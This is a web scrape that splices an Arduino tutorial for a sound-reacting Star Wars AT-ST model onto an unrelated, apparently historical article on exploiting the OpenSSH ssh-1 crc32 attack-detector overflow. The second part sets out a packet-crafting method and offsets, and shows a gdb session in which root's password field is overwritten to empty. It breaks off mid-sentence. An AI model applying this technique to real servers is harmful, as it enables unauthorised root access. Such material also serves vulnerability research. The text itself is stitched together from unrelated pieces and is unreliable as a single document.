detect_attack again. Lets check now the termination value for the last
iteration in [3], which has to be UNUSED_HASH (note the network order
offsets):
(gdb) x/16 buf + len - 8
0x8115944: 0xf5966c0d 0xb7ef464b 0x09000000
0xeed64f1a
0x8115954: 0x2c1b8d66 0x891bb13a 0x527c53d0
0x00000000
(gdb) x/16 &h[0x0d6c96f5 & 511]
0x80fdf1a: 0xffffffff 0xffffffff 0xffffffff
0xffffffff
0x80fdf2a: 0xffffffff 0xffffffff 0xffffffff
0xffffffff
Ok, it looks fine, lets continue the loop till the end and hope that
sshd wouldn't die after overwriting 0x80fdf1a with the value of j upon
the end of the [3] loop. It will take about 120 seconds on a P-100
machine to complete the loop (yes, I wrote this on an old P-100/64mb
:-).
(gdb) c
Continuing.
Unknown message during authentication: type 237
debug: Unknown message during authentication: type 237
Failed bad-auth-msg-237 for ROOT from 127.0.0.1 port 3747
Breakpoint 1, detect_attack (buf=0x8115950
"\032OÖîf\215\e,:±\e\211ÐS|R", len=16, IV=0x0) at deattack.c:136
136 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
Oooops^2, now we have fooled sshd to believe that root doesn't have a
password set, set n to be != 0 and we are still alive. SUCCESS! So it is
not difficult to imagine what happens now:
(gdb) c
Continuing.
Accepted password for ROOT from 127.0.0.1 port 3747
debug: session_new: init
debug: session_new: session 0
Breakpoint 1, detect_attack (buf=0x8100144
"\030© Ñ'\233Ç*oå\021w(Ç\035v", len=16, IV=0x0) at deattack.c:136
136 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
We didn't supply any password at all :-))) After continuation we get an
interactive session for root:
(gdb) c
Continuing.
Unknown packet type received after authentication: 9
Breakpoint 1, detect_attack (buf=0x8100158 "¾áBAS£øyÿÿÿÿ", len=8,
IV=0x0) at deattack.c:136
136 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
(gdb) c
Continuing.
debug: Entering interactive session.
debug: fd 9 setting O_NONBLOCK
debug: fd 11 setting O_NONBLOCK
debug: server_init_dispatch_13
debug: server_init_dispatch_15
On the client side we see this (no pty):
Permission denied, please try again.
debug: Requesting shell.
debug: Entering interactive session.
Environment:
USER=root
LOGNAME=root
HOME=/root
PATH=/usr/bin:/bin:/usr/sbin:/sbin
MAIL=/var/spool/mail/root
SHELL=/bin/bash
SSH_CLIENT=127.0.0.1 3747 7777
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),12(mail),14(uucp),15(shadow),16(dialout),42(trusted),100(users),101(untrusted),65534(nogroup)
That's all !'"§$!...
Now you will probably understand, why the crc32 hole is very difficult
to exploit. Also any brute force approach one may try would consume the
network bandwith...
Nevertheless, upgrade your sshd as soon as possible :-)
ihq.
--------------------------------------------------------------------------------
ATTACHED: sshd_exploit.diff !!! DEMONSTRATION CODE, NO TROJAN, NO JOKE
!!!
--- crc32.c Thu Jun 22 13:32:32 2000
+++ patched_crc32.c Tue Feb 20 03:02:04 2001
@@ -119,3 +119,14 @@
}
return crc32val;
}
+
+unsigned int
+crc32_recursive(const unsigned char *s, unsigned int crc32val)
+{
+ unsigned int i;
+ for (i = 0; i < 4; i ++) {
+ crc32val = crc32_tab[(crc32val ^ s[i]) & 0xff] ^ (crc32val >> 8);
+ }
+
+ return crc32val;
+}
--- dispatch.c Thu Jun 22 13:32:32 2000
+++ patched_dispatch.c Tue Feb 20 03:02:18 2001
@@ -71,7 +71,8 @@
if (type > 0 && type < DISPATCH_MAX && dispatch[type] != NULL)
(*dispatch[type])(type, plen);
else
- packet_disconnect("protocol error: rcvd type %d", type);
+// packet_disconnect("protocol error: rcvd type %d", type);
+ debug("WOULD TERMINATE: type : %d", type);
if (done != NULL && *done)
return;
}
--- packet.c Tue Jul 11 01:29:50 2000
+++ patched_packet.c Tue Feb 20 03:04:16 2001
@@ -72,6 +72,12 @@
/* Encryption context for sending data. This is only used for
encryption. */
static CipherContext send_context;
+// we have to decrypt all data before sending with backup in order to
be able
+// to predict the values on sshd's side
+static CipherContext backup_context;
+static char tmpbuf[1024];
+
+
/* Buffer for raw input data from the socket. */
static Buffer input;
@@ -146,6 +152,7 @@
cipher_type = SSH_CIPHER_NONE;
cipher_set_key(&send_context, SSH_CIPHER_NONE, (unsigned char *) "",
0);
cipher_set_key(&receive_context, SSH_CIPHER_NONE, (unsigned char *)
"", 0);
+ cipher_set_key(&backup_context, SSH_CIPHER_NONE, (unsigned char *) "",
0);
if (!initialized) {
initialized = 1;
buffer_init(&input);
@@ -298,8 +305,69 @@
unsigned int bytes)
{
cipher_encrypt(cc, dest, src, bytes);
+
+// on ssh side we maintain a copy of remote's cipher context in order
to be able
+// to decrypt our messages
+// we simply decrypt all we crypt to stay informed about what remote
sides is doing with our data :-)
+ cipher_decrypt(&backup_context, tmpbuf, dest, bytes);
+
}
+// decrypts the stream as it would happen on the other side
+void
+backup_decrypt(void *dest, void *src, unsigned int bytes)
+{
+CipherContext cc;
+
+// do not modify backup context
+ cc=backup_context;
+ cipher_decrypt(&cc, dest, src, bytes);
+}
+
+void
+send_encrypt(void *dest, void *src, unsigned int bytes)
+{
+static CipherContext cc2;
+static int c=0;
+CipherContext cc;
+
+ if(c==0) {
+ cc2=send_context;
+ c++;
+ debug("frezing a copy of send_context !");
+ }
+
+ cc=cc2;
+ cipher_encrypt(&cc, dest, src, bytes);
+}
+
+void
+send_encrypt_modify(void *dest, void *src, unsigned int bytes)
+{
+ cipher_encrypt(&send_context, dest, src, bytes);
+}
+
+void
+send_encrypt_save(void *dest, void *src, unsigned int bytes, int save)
+{
+static CipherContext cc2;
+static int c=0;
+CipherContext cc;
+
+ if(c==0) {
+ cc2=send_context;
+ c++;
+ debug("frezing a copy of send_context !");
+ }
+
+ cc=cc2;
+ cipher_encrypt(&cc, dest, src, bytes);
+
+ if(save)
+ cc2=cc;
+}
+
+
/*
* Decrypts the given number of bytes, copying from src to dest. bytes
is
* known to be a multiple of 8.
@@ -346,6 +414,9 @@
/* All other ciphers use the same key in both directions for now. */
cipher_set_key(&receive_context, cipher, key, keylen);
cipher_set_key(&send_context, cipher, key, keylen);
+ debug("stored copy of send context");
+ backup_context=send_context;
+ cipher_set_key(&backup_context, cipher, key, keylen);
}
/* Starts constructing a packet to send. */
--- sshconnect1.c Tue May 9 03:03:04 2000
+++ patched_sshconnect1.c Tue Feb 20 03:01:44 2001
@@ -651,6 +651,126 @@
return 0;
}
+extern void send_encrypt(void *dest, void *src, unsigned int bytes);
+extern void send_decrypt(void *dest, void *src, unsigned int bytes);
+extern unsigned crc32_recursive(const unsigned char *s, unsigned int
crc32val);
+extern void backup_decrypt(void *dest, void *src, unsigned int bytes);
+extern void send_encrypt_modify(void *dest, void *src, unsigned int
bytes);
+extern void send_encrypt_save(void *dest, void *src, unsigned int
bytes, int save);
+unsigned int crc32(const unsigned char *s, unsigned int len);
+
+
+// this will construct valid ssh packet, containing ignored message
+// with cipher(packet) = magic offset to write to configured offset
+// and the packet will have valid (encrypted) crc :-)
+void bigpacket()
+{
+unsigned DATALEN=1024*86;
+unsigned paddedlen=(DATALEN + 8) & ~7;
+
+unsigned char* buf;
+unsigned char* buf2, *buf3;
+
+int connection_out;
+
+unsigned* ptr, *ptr2, i, checksum, w;
+unsigned* chkp;
+
+unsigned off;
+unsigned noff;
+unsigned npos=512;
+
+
+ debug("*** writing big packet ***");
+
+ srand(time(NULL));
+
+ buf3=getenv("OFF");
+ if(!buf3) {
+ debug("please set OFF");
+ exit(1);
+ }
+
+ sscanf(buf3, "%x", &off);
+ debug("\nOFF : %x", off);
+
+ buf3=getenv("NOFF");
+ if(!buf3) {
+ debug("please set NOFF");
+ exit(1);
+ }
+
+ sscanf(buf3, "%x", &noff);
+ debug("\nNOFF : %x", noff);
+
+// alloc mem
+ buf=(unsigned char*)malloc(DATALEN+1024);
+ buf2=(unsigned char*)malloc(DATALEN+1024);
+ buf3=(unsigned char*)malloc(DATALEN+1024);
+
+ memset(buf3, 0x00, DATALEN+512);
+ memset(buf2, 0x00, DATALEN+512);
+ memset(buf, 0x00, DATALEN+512);
+
+ ptr=(unsigned*)(buf);
+ ptr2=(unsigned*)(buf2);
+
+// socket fd
+ connection_out=packet_get_connection_out();
+
+// construct plain text to get buf[k] = offset after encryption
+ for(i=0;i<paddedlen/4;i+=2) {
+ ptr2[i]=htonl(0x0);
+ ptr2[i+1]=0xffffffff;
+ }
+
+// for writing to n
+ ptr2[0]=htonl(noff);
+ ptr2[npos*2]=htonl(noff);
+
+// for writing to pw->pw_passwd
+ ptr2[256*2]=htonl(off);
+ ptr2[0x78*2]=htonl(off);
+
+// write checksum
+ chkp=(unsigned*)(buf+paddedlen);
+
+ backup_decrypt(buf+4, buf2, paddedlen-8);
+
+// message type
+ ptr[0]=htonl(DATALEN);
+
+// compute checksum
+ checksum=crc32((unsigned char *) buf+4, paddedlen-4);
+ *chkp=htonl(checksum);
+
+// buf contains decrypted plaintext!
+ send_encrypt_save(buf2, buf+4, paddedlen-8, 1);
+ checksum=crc32((unsigned char *) buf+4, paddedlen-8);
+ *(chkp-1)=((unsigned)rand());
+ w=crc32_recursive((unsigned char *) buf+4 + (paddedlen-8), checksum);
+ *chkp=htonl(w);
+
+// encrypt freeval + new crc32 and copy this into buf2
+ send_encrypt_save(buf2 + (paddedlen-8), buf+4 + (paddedlen-8), 8, 0);
+
+// now buf is ready to send (encrypted) !!!
+// modify our send_context to maintain synchronisation with the server
:-)
+ send_encrypt_modify(buf3, buf+4, paddedlen);
+ memcpy(buf+4, buf2, paddedlen);
+
+// write packet now:
+ if (atomicio(write, connection_out, buf, paddedlen+4)!=paddedlen+4)
+ fatal("write: %.100s", strerror(errno));
+
+ free(buf);
+ free(buf2);
+ free(buf3);
+
+ debug("*** wrote bigpacket ***");
+}
+
+
/*
* Tries to authenticate with plain passwd authentication.
*/
@@ -663,14 +783,32 @@
debug("Doing password authentication.");
if (options.cipher == SSH_CIPHER_NONE)
log("WARNING: Encryption is disabled! Password will be transmitted in
clear text.");
+
+// prepare 0xffff field !
+ debug("sending 0xffff packet");
+ packet_start(0xf8);
+ password=malloc(512);
+ memset(password, 0x00, 512);
+ packet_put_string(password, 512);
+ packet_send();
+ packet_write_wait();
+ free(password);
+
+ type = packet_read(&payload_len);
+ if (type == SSH_SMSG_SUCCESS)
+ debug("sshd accepted 0xffff msg");
+ if (type != SSH_SMSG_FAILURE)
+ debug("sshd bounced 0xffff msg !!!");
+
+// clear remote pass :-)
+ bigpacket();
+
for (i = 0; i < options.number_of_password_prompts; i++) {
if (i != 0)
error("Permission denied, please try again.");
- password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
packet_put_string(password, strlen(password));
- memset(password, 0, strlen(password));
- xfree(password);
packet_send();
packet_write_wait();
Yes, I'm continously looking for a very good job... | http://packetstormsecurity.org/files/24347/ssh1.crc32.txt.html | crawl-003 | refinedweb | 4,065 | 59.84 |
Updated on Kisan Patel
The .Net Framework provides a number of APIs for working with XML data. LINQ to XML is the API for processing the XML document.
LINQ to XML provides an extensive collection of classes for a variety of purposes. These classes reside in the
System.Xml.Linq namespace from the
System.Xml.Linq.dll assembly. Here, some of the most commonly used classes from this hierarchy.
The XNode abstract class represents a node of an XML tree. The XContainer, XText, XComment, and XProcessingInstruction classes inherit from the XNode class. The XContainer class in turn acts as a base class for the XDocument and XElement classes. As you might have guessed, these classes represent a text node, comment, processing instruction, XML document, and element, respectively.
The classes such as XAttribute, XComment, XCData, and XDeclaration are independent of the XNode hierarchy and represent attribute, comment, CDATA section, and XML declaration, respectively. The XName class represents the name of an element (XElement) or attribute (XAttribute). Similarly, the XNamespace class represents a namespace of an element or attribute.
LINQ to XML comprises two things.
Now, let’s move on to take a look at a LINQ to XML example and find student names from an XML file. LINQ to XML loads an XML document into a query-able XElement type and then IEnumerable loads the query results, and using a foreach loop, we access it.
students.xml
<?xml version="1.0" encoding="utf-8" ?> <students> <student id="1"> <name>Kisan</name> <city>Ladol</city> </student> <student id="2"> <name>Ravi</name> <city>Vijapur</city> </student> <student id="3"> <name>Ujas</name> <city>Ladol</city> </student> <student id="4"> <name>Ketul</name> <city>Ladol</city> </student> </students>
Program.cs
using System; using System.Collections.Generic; using System.Linq; using System.Xml.Linq; namespace ConsoleApp { class Program { static void Main(string[] args) { //Load XML File XElement xmlFile = XElement.Load(@"c:\students.xml"); //Query Creation IEnumerable students = from s in xmlFile.Elements("student").Elements("name") select s; //Execute Query foreach (string student in students) { Console.WriteLine(student); } } } }
Above program produce following output.
As Seen in above example, LINQ to XML offers a slightly different syntax that operates on XML data, allowing query and data manipulation. | http://csharpcode.org/blog/linq-to-xml/ | CC-MAIN-2019-18 | refinedweb | 371 | 50.43 |
Templatizing Github "Template Repos"
Adding the (obvious) missing feature to Github Template Repositories
. Template Repositories are a convenient way to allow users to clone a codebase without having to
git clone and remove the Git local repository (i.e.
.git).
However, this is where the utility of Github Template Repositories ends.
In my mind, the whole purpose of a "template repository" is to allow users to easily customize the repo for their own use. Unfortunately, Github does not offer any kind of mechanism for substituting placeholders with our own values (there is actually no real concept of a placeholder with Template Repositories).
There are many viable frameworks project scaffolding frameworks around, and if you are comfortable with one, please use it. I don't think many of them work well with Github Templates since you are starting with an existing codebase (not generating one). I also prefer a simple solution that doesn't take a ton of headspace to use. My requirements are simple:
- Use placeholders in files that can be substituted from a template file.
- Preserve the file structure of the template repo (having to use a flat file structure sucks).
- Don't have a lot of special rules (like sacred directories, naming schemes, etc.).
- Make the process easily repeatable (should you screw up the process).
- Gracefully clean up the template scaffolding.
Solution
Assuming you have
tree and
gomplate installed locally, start with a simple script called
customize:
#!/usr/bin/env bash ignore_files=".git|node_modules|_templates|customize|README.md" for input_file in `tree -I "${ignore_files}" -Ffai --noreport` do if [ ! -d "${input_file}" ]; then echo "Processing file: ${input_file}" gomplate \ -f "${input_file}" \ -o "${input_file}" \ --left-delim "<<[" \ --right-delim "]>>" \ -c cus=./customize.json fi done # Clean up / implode rm README.md mv README_TEMPLATE.md README.md mv github .github rm customize
Basically, this script uses
tree to get the hierarchy of files in the project directory (ignoring files use the pattern
ignore_files), and treats every file as a template to be rendered. If there are no template variables, there will be no changes (at least in terms of
.git hashing -- though the file will be rewritten). If the file does have "placeholders", the placeholders will be rendered when the file is rewritten to disk.
In my setup, I use an unusual placeholder syntax:
<<[ variable ]>> (as represented by the
--left-delim and
--right-delim arguments). I do this to prevent collisions with code-based templating ( (for instance, Github Actions uses
${{ variable }} and Handlebars uses
{{ variable }}).
Data is sourced from the file
customize.json, which is also located in the root of the project:
{ "foo": "bar", "nesting": { "is": { "ok": true } } }
The script argument
-c cus=./customize.json is used by
gomplate to create a "context,"
which is simply a helpful way to namespace variables. Using the existing example, you can access the variables in
customize.json using the following placeholders:
<<[ .cus.foo ]>> and
<<[ .cus.nesting.is.ok ]>>. If you don't like the prefix
.cus, you can change it to whatever you desire:
-c <context-name>=./customize.json.
gomplatehas many other data source strategies and utility methods. I recommend checking out the utility's documentation (which is excellent).
Finally, the
customize script uses the "implode" pattern (most people know it from Create React App) where files are moved to their correct places in the file structure and scaffolding is deleted. I use this especially for the
.github directory because I don't want a templatized version of Github Actions running whenever commits are made to the template repo. I also tend to have two
README.md documents. One describes how to use the template repo, and the other is the templatized version of the
README.md that will remain after
customize is ran.
Conclusion
Github Template Repositories are a great tool for allowing developers to clone and customize repositories, but the process has some deficiencies that can be addressed very simply with a templating technology and some
bash. The
customize script (above) is what we use at Peachjar for customizing new microservice and microapp projects from our "starter kits" (all Github Template Repositories). Hopefully, this will inspire you to create similar template repositories for use within your own project or organization.
You might also be interested in these articles...
Stumbling my way through the great wastelands of enterprise software development. | https://rclayton.silvrback.com/templatizing-github-template-repos | CC-MAIN-2021-17 | refinedweb | 715 | 56.55 |
User talk:Un-MadMax/Archive
From Uncyclopedia, the content-free encyclopedia
Benifits
See? another benifit of logging in, you can move pages! Cheers. PS: I am not sure, but {{subcat|Categoryname}} might be the preferred method for categorizing categories. --Splaka 01:20, 22 Oct 2005 (UTC)
Plemptates Templates
I see you messing up my wilde templates. If you could, leave templates alone. Reason being that they are on many pages, and if you mess one up, you could potentially screw up a hundred+ different pages. Thanks for reverting your changes.
Sir Famine, Gun ♣ Petition » 02:16, 22 Oct 2005 (UTC)
- Hey - it's really no big deal. I appreciate that you took the time to revert your changes. A lot of people don't, and then I get really irritable. As it is, you made it onto my good list by cleaning up your mess and replying civily. That and the World Monocle Wearing Championship Wilde quote is fantastic. Nice work all around.
Sir Famine, Gun ♣ Petition » 00:41, 25 Oct 2005 (UTC)
Ban
Had to ban some aol again, holler if you need it lifted. Is there a way you can disable the random element of aol's proxy browser? Or get any other ISP at all? *grin* --Splaka 06:23, 23 Oct 2005 (UTC)
Poland
Your map is great, but we need english version, too. ;p --MaDeR 20:22, 24 Oct 2005 (UTC)
If you can't find proper place for your damn article about Bogdan Raczynski, then it is your problem. Maybe your article is not so good?
Uncyclopedian of the Month
That's right, all your hard work is about to pay off BIG TIME. --—rc (t) 00:58, 25 Oct 2005 (UTC)
Zombie Jesus
The offered screenshot sounds hot, Max. go for it!--Sarducci 13:17, 2?) --
Sir BobBobBob ! S ? [rox!|sux!]
23:05, 4 Nov 2005 (UTC)
Grovels
Could I beg you to, when in the mood for linkification, possibly help out a couple of my articles that are poorly linked and categorized? I'm nearly helpless in this respect...
I specifically need help with I Can't Believe It's Not Hitler and Eva Perón, though all my children usually need help, since I stink at the linkification of my articles.
Thanks!
» Brig Sir Dawg | t | v | c » 12:39, 7 Nov 2005 (UTC)
Vanity2
I created the template because I thought it would be funny for certain pages that obviously werent vanity to have a vanity template. I only ended up putting it on Satan. So since only one page needs it, I will move it to out of the template namespace. No need to QVFD it, I can deal with it. Thanks for pointing it out to me. --Paulgb 21:13, 9 Nov 2005 (UTC)
- Oh, I misunderstood the question. I thought you wanted to QVFD the template to get rid of it. Feel free to use the template however you like. --Paulgb 21:21, 9 Nov 2005 (UTC)
Templates Category
I noticed that you added all the [[Awards/]] templates to the templates category. The problem with this is that once the pages with the templates on them start to get edited, all the user pages will also go in the Template category. Is this what you wanted to do? I havn't reverted because I wasn't sure. The Awards category works the same way. --Paulgb 22:16, 14 Nov 2005 (UTC)
- When we upgrade to 1.5 we can put them in the templates with and they won't show when the template is used. Until then they probably should not get categories. --Splaka 23:23, 14 Nov 2005 (UTC)
Feed me
Hello, there! I was wondering if you, with all your categorizing might, might stick the new Feedback page somewheres, or at least recommend some categories in which I could stick it? I will have to redo the image once it is categorized, so perhaps just some recommendations would do. I would be aplentifully thankful! --Skyscraper 15:28, 14 Dec 2005 (UTC)
- I'll tell you where to stick it - You're BANNED!!! How's that for service with a smile, eh? Now my secret's finally out - I'm an artist. Like a mime. Just a lot louder, and without the crazy face-paint. Yessirreee.
Sir Famine, Gun ♣ Petition » 00:50, 15 Dec 2005 (UTC)
Thanks! --Skyscraper
- I mean, really, when you ask someone where to stick something, what do you expect? Had I had access to the super-secret, "stick it to the man" admin button, I'd have used that. Lacking that technology, I used my ban stick. Not to be confused with the ED Slogan: "Could you pull this pointed, beetle-laden stick out of my ass?" Which I personally think is one of the funniest slogans on this site. And on the topic of said stick, you seem to be lacking one quite seriously. Sure this site is for you? The six senses are welcome here, but not the 7th, humor.
Sir Famine, Gun ♣ Petition » 02:55, 16 Dec 2005 (UTC)
- The thanks was directed at MadMax (note the lack of indent) for categorizing Feedback for me. Also, out of respect for MadMax's talk page, you are welcome to repost the above message on my talk page and we can continue to bicker there. --Skyscraper 04:39, 16 Dec 2005 (UTC)
Wrestling
wrestling?? 130.111.98.244 20:00, 20 Dec 2005 (UTC) like??
Max is Mad!
Max is Mad! new to UN!
whats up with you and Uma? 130.111.98.244 20:56, 20 Dec 2005 (UTC)
Skull and Bones
Thanks for cleaning up "Skull and Bones" for me, I'm new here, and still getting the hang of things! :) | http://uncyclopedia.wikia.com/wiki/User_talk:MadMax/Archive?oldid=2030417 | CC-MAIN-2015-35 | refinedweb | 960 | 83.56 |
UrbanYodaMembers
Content Count5
Joined
Last visited
Community Reputation1 Newbie
About UrbanYoda
- RankNewbie
- React is a fussy beast. Importing without being able to confirm the script being loaded just wasn't working for me.
- UPDATE: It turns out React was rendering before the plugin was fully loaded. My basic useScript custom hook needed to be fleshed out a bit more, so I swapped it out for the useScript hook from, which contains loading and error variables. With this, I was able to run the animation once I was sure the script was in memory. With those changes, everything is now working properly. Here's my updated code: import useScript from './hooks/useScript' //component containing SVG import TestComponent from 'components/TestComponent' const App = () => { // plugin lives in /public folder const [loaded, error] = useScript('/DrawSVGPlugin.min.js') return ( <div> { loaded && <TestComponent/> } </div> ) } export default TestComponent
- So, I was able to get this working after @OSUblake's suggestion to console.log out the plugins. Turns out placing the script in the HTML wasn't loading (React was resolving the wrong path even though the script and HTML live in the same directory...still haven't figured out why), so I expanded on @elegantseagulls' idea and created a custom hook called useScript to dynamically load the script in my component: useScript.js: import { useEffect } from 'react'; const useScript = url => { useEffect(() => { const script = document.createElement('script'); script.src = url; script.async = true; document.body.appendChild(script); return () => { document.body.removeChild(script); } }, [url]); }; export default useScript; Using hook in component: import useScript from './hooks/useScript' const TestComponent = () => { // plugin lives in /public folder useScript('/DrawSVGPlugin.min.js') ... } export default TestComponent Now the script is loading and all is almost good. I'm having a pesky bug where the SVG animation doesn't work on the first render, but after clicking back then forward in the browser, it works perfectly. I'm pretty sure this is a state management issue on my end, so I'm going to restructure and test later. Will keep you posted on my results. Again, a sincere thanks to everyone for their input 😀.
- Oh, I had no idea that was the case with the Club GreenSock membership! Now I know...I'll have to upgrade soon. No need to convince me...I've been a huge GSAP fan for years. However, aside from that, I'm actually using v2.1.3 of NPM GSAP, so everything is version 2.x. Does that add enough information to clarify my question?
- UrbanYoda started following Using GSAP 2.x paid plugins with React
Using GSAP 2.x paid plugins with React
UrbanYoda posted a topic in GSAPHi! | https://greensock.com/profile/79072-urbanyoda/ | CC-MAIN-2020-16 | refinedweb | 439 | 59.6 |
Need for notification mailing lists
I found several people looking for a way to implement post-only mailing lists with GNU Mailman. However, I couldn’t find solutions that are described in sufficient detail.
In particular, this type of list is useful for notification mailing lists. In Free Electrons’ case, whenever someone pushes commits to our public git trees, a notification e-mail is sent. Sometimes, internal discussions can follow, but we do not wish to make them public. This is why we do not want the list e-mail address to be shown in the messages that are sent. If the list address doesn’t appear in the
To,
CC or in
Reply-To headers, members who are authorized to post messages without moderation won’t post replies to the list by mistake by using the “Reply to all” functionality of their e-mail client.
The problem is that the current version of GNU Mailman doesn’t support this type of list yet, at least with the parameters in the list administration interface. You can turn on the “Full personalization” option, which will send messages to each member individually, so that the list address doesn’t appear in the
To header. You can also customize the
Reply-To header, to an address that is different from the list address. However, the
CC header will still hard-code the list address.
A possibility is to hack the
/usr/lib/mailman/Mailman/Handlers/CookHeaders.py file, but this solution would apply to all the lists at once, and the changes you could make may interfere with Mailman updates. A much nice solution is to extend Mailman, to modify its behavior for specific mailing lists.
A working solution
This solution is based on explanations given on the Mailman wiki, and was implemented on Ubuntu 12.04.
First, create a
list-test mailing list. Some of the commands below will assume that you named your new list this way. Now, go to its administration interface and enable “Full Personalization” in “Non-digest” options. In “General options”, in the “Reply-To: header munging” section, specify a reply-to address.
If you send a test message to your new list, you will see that the list address is still in the CC header of the message that you receive.
Now, create a
RemoveCC.py file in the
Handlers directory (
/usr/lib/mailman/Mailman/Handlers/RemoveCC.py on Ubuntu 12.04):
# Your comments here """Remove CC header in post-only mailing lists This is to avoid unmoderated members to reply to messages, making their replies public. Replies should instead go to a private list. """ def process(mlist, msg, msgdata): del msg['Cc']
This will be yet another filter the list messages will go through. Now compile this file in the directory where you put it:
pycompile RemoveCC.py
The next thing to do is to modify the default filter pipeline for your new list. You can do it by creating a
/var/lib/mailman/lists/list-test/extend.py file with the below contents:
import copy from Mailman import mm_cfg def extend(mlist): mlist.pipeline = copy.copy(mm_cfg.GLOBAL_PIPELINE) # The next line inserts MyHandler after CookHeaders. mlist.pipeline.insert(mlist.pipeline.index('CookHeaders') + 1, 'RemoveCC')
This will add your new filter right after the
CookHeaders one. To enable this, you have to run:
/usr/sbin/config_list -i /var/lib/mailman/lists/list-test/extend.py list-test
You can now send a new test message, and you will see that the CC header is now gone.
Notes
- Of course, you can reuse the same
extend.pyfile for multiple mailing lists. However, the solution doesn’t work if you don’t put the file inside
/var/lib/mailman/lists/list-name(distributions other than Ubuntu 12.04 may have different paths).
- I didn’t manage to undo this change. The Mailman wiki gives a solution based on creating a file containing
del mlist.pipelineand running
/usr/sbin/config_list -i this-file list-name, but it didn’t work for me. Please post a comment below if you find a way to implement this, and return to “factory” settings.
- Don’t hesitate to share other ways of implementing this kind of functionality! | https://bootlin.com/blog/author/mike/page/3/ | CC-MAIN-2018-17 | refinedweb | 704 | 56.76 |
Decoupling Techniques: How Do I Get That Rubber Band in the Middle?
How do you know when a system is tightly coupled or not? In this post, I discuss why it's so important to decouple your code and how to identify and fix the problems.
Every developer is looking for that holy grail of an ultimate software system that is entirely decoupled.
There are a number of ways to decouple a system. However, if you don't have the experience to identify one, it may take some years to immediately know when a website or system is tightly coupled.
Custom applications can look like our rubber band ball shown above. I need the rubber band (method) from the middle and I don't know how to get it?
Today's post discusses how to identify if a system is too tightly coupled and make it more open.
Take it From The Top
When a system is tightly coupled, it describes the relationship between two entities (usually classes) in a software system. If one class knows too much about the other class, it's considered tightly coupled.
When class A starts to know too much about class B, then it's time to start examining the code.
But how do you know if a system is tightly coupled or not?
Tips for Decoupling Software
Take a handful of developers and throw them into a room and based on experience, every one of them will have a different way of decoupling the software.
Here are some tips on what to look for when identifying whether code is tightly coupled or not.
Internal or Sealed Access Modifiers
Internal access modifiers are accessible only within files in the same assembly where sealed access modifiers are classes that prevent other classes from inheriting from it.
Over my years of development, I have never used Internal or Sealed (yes, I know what they do).
In my opinion, if you have one, it causes some issues. If you have both (an internal and a sealed), it just makes matters worse.
Let's say you have this piece of code (don't laugh...this is in production...somewhere):
internal sealed class Address { public string Address1 { get; set; } public string Address2 { get; set; } public string City { get; set; } public string State { get; set; } public string Zip { get; set; } public string Country { get; set; } }
Joe-programmer comes in on his first day on the job and has to inherit to make a new Address class. How do you fix this issue without modifying the class and ruining all of the unit tests?
You work around it. You build a wrapper, add an interface to make it less decoupled, and hide the workings of the Address implementation until you can refactor it later.
public class PolicyAddress: IPolicyAddress { private Address _address; public PolicyAddress() { _address = new Address(); } public string Name { get; set; } public string Address1 { get { return _address.Address1; } set { _address.Address1 = value; } } public string Address2 { get { return _address.Address2; } set { _address.Address2 = value; } } public string City { get { return _address.City; } set { _address.City = value; } } public string State { get { return _address.State; } set { _address.State = value; } } public string Zip { get { return _address.Zip; } set { _address.Zip = value; } } public string Country { get { return _address.Country; } set { _address.Country = value; } } } public interface IPolicyAddress { string Name { get; set; } string Address1 { get; set; } string Address2 { get; set; } string City { get; set; } string State { get; set; } string Zip { get; set; } string Country { get; set; } }
While this isn't the best approach, it gets the class built and is workable until a better refactoring can happen (hopefully in the not-too-distant future). ;-)
Dependency Injection (DI) or Inversion of Control (IoC)
Lately, this has been the mantra of every developer worth their salt. I mentioned a while back that I was using a Dependency Injection library called Ninject, but after some interesting news about performance issues, I'm moving towards StructureMap now.
In my opinion, dependency injection can be described in two words: Decoupled Factories. Any DI library can immediately enhance your development so long as you are following the rules of development by using interfaces.
The idea behind DI is that you are letting your DI library know how to create an instance of an object by telling it which interfaces are attached to which concrete classes.
There is the drawback of having no interfaces in your code. If you don't have interfaces in your code, then you really don't need...no, can't use, dependency injection.
Simpler (and smarter) Access to Objects
Have you ever seen this code before?
Order.Customer.Address.City
This code violates the Law of Demeter. The Law of Demeter for functions requires that a method m of an object O may only invoke the methods of the following kinds of objects:
- O itself
- m's parameters
- Any objects created/instantiated within m
- O's direct component objects
- A global variable, accessible by O, in the scope of m
So if we follow our guidelines and refactor the example above, we come up with:
var name = Order.GetCity();
The general rule is to only "Use one dot."
If you need a more concrete example, I would recommend reading The Paperboy, The Wallet, and the Law of Demeter (pdf).
Unit Tests
I've said before that unit tests show more than just a red/green passing grade. Write your unit tests like you are writing production code. Envision how you see the code working and write it as such in your unit tests.
When you're developing an application, unit tests can show you how simple or how complex you can build a system.
Once you have those concepts in your unit tests (and they pass), you can transfer the concept over to real code...and the best part is that your code is all ready to go because it's been tested.
Conclusion
As you can see, there are many ways to take existing code and refactor it into something more usable.
I see programmers with 15 to 20 years of experience expanding their career path even further by adding new skills of identifying and refactoring coupled software into flexible, easily maintainable code for future reuse.
Decoupling and refactoring software will become more of a required talent.
Do you have any more techniques on how to decouple software? Post them in the comments below. | https://www.danylkoweb.com/Blog/decoupling-techniques-how-do-i-get-that-rubber-band-in-the-middle-BH | CC-MAIN-2017-26 | refinedweb | 1,064 | 63.19 |
We are going to take a look at a new cool feature of C# 2.0. It is not constrained to C# but also available with other .NET languages.
As the projects get more complicated, programmers increasingly need a means to better reuse and customize their existing component-based software. To achieve such a high level of code reuse in other languages, programmers typically employ a feature called Generics. Using Generics, we can create class templates that support any type. When we instantiate that class, we specify the type we want to use, and from that point on, our object is "locked in" to the type we chose.
Let us look at an example of how we can create a generic class using C# 2.0.
public class MyCustomList<MYTYPE> { private ArrayList m_list = new ArrayList(); public int Add(myType value) { return m_list.Add(value); } public void Remove(myType value) { m_list.Remove(value); } public myType this[int index] { get { return (myType)m_list[index]; } set { m_list[index] = value; } } }
Here,
MyCustomList is built on an
ArrayList. But its methods and indexer are strongly typed. Here
<myType> is really just a placeholder for whatever type you choose when you create the class. This placeholder is defined in angled brackets after the name of the class. Now, let us look at how to create an instance of the class
MyCustomList:
MyCustomList<int> list = new MyCustomList<int>(); // Add two integers to list
